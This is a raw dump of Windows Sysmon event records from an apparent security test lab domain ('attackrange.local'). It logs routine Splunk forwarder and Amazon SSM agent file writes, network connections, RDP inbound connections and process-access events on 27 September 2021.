Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=118730D31B122D17D3239DDFCBD42B40,SHA256=1007C37791DC5AF84EFA7DED119211A967F7597ED81E3BEE01F5656469B02AD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:13.827{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:13.624{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34A82D6D1E5E423EE37309CD0AD864C8,SHA256=8D2AC18182DC8E0FB05BCEB9ECBA6F763642CF12C64CEE947F2DC33AAA63F510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:14.854{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F20122C4C76F8E25162586DA55F16A90,SHA256=D50CAE0C56D9D582074A676FAEC67A681ACAC741EDC68B933AC93531B72938CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:14.450{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4315MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:15.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6A52DFB05392FD3D0359F215DD06171,SHA256=5ED83CD4603E7102B0A81E0DCCCF6B82BF3A504FA296090308F9BD01CAFC7249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:15.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADF5767C3BF770B4EE55EBF1805AA340,SHA256=6DD652EB6308F235B7073C3ACCC6014BC2994AE23F85FD07338D97DB9C4A3E31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:15.464{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4316MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:16.255{5EBD8912-7F11-614D-0100-00000000FC01}4NT AUTHORITY\SYSTEMSystemC:\Windows\System32\LogFiles\WMI\NtfsLog.etlMD5=BA6DE86ACCE6FED453E9D89AC94192FF,SHA256=46FA5B8383AD94CF55EA39AAC54107E0C5037FA7CD085E3380BFCE4B6D9C219B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:16.255{5EBD8912-7F11-614D-0100-00000000FC01}4NT AUTHORITY\SYSTEMSystemC:\Windows\System32\LogFiles\WMI\RtBackup\EtwRTUBPM.etlMD5=AC3B5A19643EE5816A1DF17F2FADAAE3,SHA256=834A709BA2534EBE3EE1397FD4F7BD288B2ACC1D20A08D6C862DCD99B6F04400,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000001052445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:16.239{5EBD8912-7F11-614D-0100-00000000FC01}4NT AUTHORITY\SYSTEMSystemC:\Windows\System32\WDI\LogFiles\WdiContextLog.etl.002MD5=12613427B80B56804434E6915ABF296A,SHA256=84BE5FF90D2C71FD3A93D911A30C97792EF0A6580A66CA494B027D30A954469E,IMPHASH=00000000000000000000000000000000falsetrue 2553225500x80000000000000001052444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local2021-09-27 09:19:16.224GetConfigurationOptionsFailed to open service configuration with error 19 - Last error: The media is write protected. 2553225500x80000000000000001052443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local2021-09-27 09:19:16.224GetConfigurationOptionsFailed to open service configuration with error 19 - Last error: The media is write protected. 354300x8000000000000000980318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:12.450{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59472-false10.0.1.12-8089- 354300x8000000000000000980320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:13.011{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65331-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:17.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A999F5BA3C102C74FAAD2C9947685C,SHA256=33694367E3C2FE8C8EB0AB1DFA76C7DE347F0EF622EA7767E83B47E9871A2002,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:13.789{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59473-false10.0.1.12-8000- 23542300x8000000000000000980321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:18.167{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53A6188B603468D027188F00A6C07C9,SHA256=229DCF01974CB5FAEBA17ACA00E22351B1E0517733D210C94A749E48673B17AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:19.167{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3749EF3E8E6E76C4FEA13F2F804E10,SHA256=F333989B1411363B373F71795CE3C8ADF93FD8E88E47D5B87803142A164EACE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:20.402{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AF3F4A822CC65BB3FD000F13A41E98,SHA256=DA18C3CB984534EA904D563764AB4EDA1C82D297AC7A5D6C269A75759A67E915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:21.636{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E67179FB3ADFB143955541397E22AFA,SHA256=25F39A15F3A830C357E71F6F9A13CE5C97B80F44D1FD9F57FCB248CBB32FAA97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:18.884{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59474-false10.0.1.12-8000- 23542300x8000000000000000980327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:22.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19248C6F439EA8B942CFBE95889B2790,SHA256=180740595907E1068334769BF356E42E7A3903E236D49821D5824C742D9DBEAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:20.177{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53706-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:20.084{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53636-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:24.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DEDA631BD95C0C0C2B8A1A58BBA4CB,SHA256=DDC633423B93D6688F8578E21367C40ABEB0665018D29DF80E2FCDA6FBAD7FCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.953{69CF5F33-8C9D-6151-F879-00000000FD01}32081456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C9D-6151-F879-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C9D-6151-F879-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.640{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C9D-6151-F879-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.626{69CF5F33-8C9D-6151-F879-00000000FD01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:25.218{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EB7C3D9B42D69F8E35A889D0BF6DB9D,SHA256=58372CBB1B67048A1E24E81B58BB65F486F6AA9448AFDCD60F8CC8B147329BF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C9E-6151-FA79-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 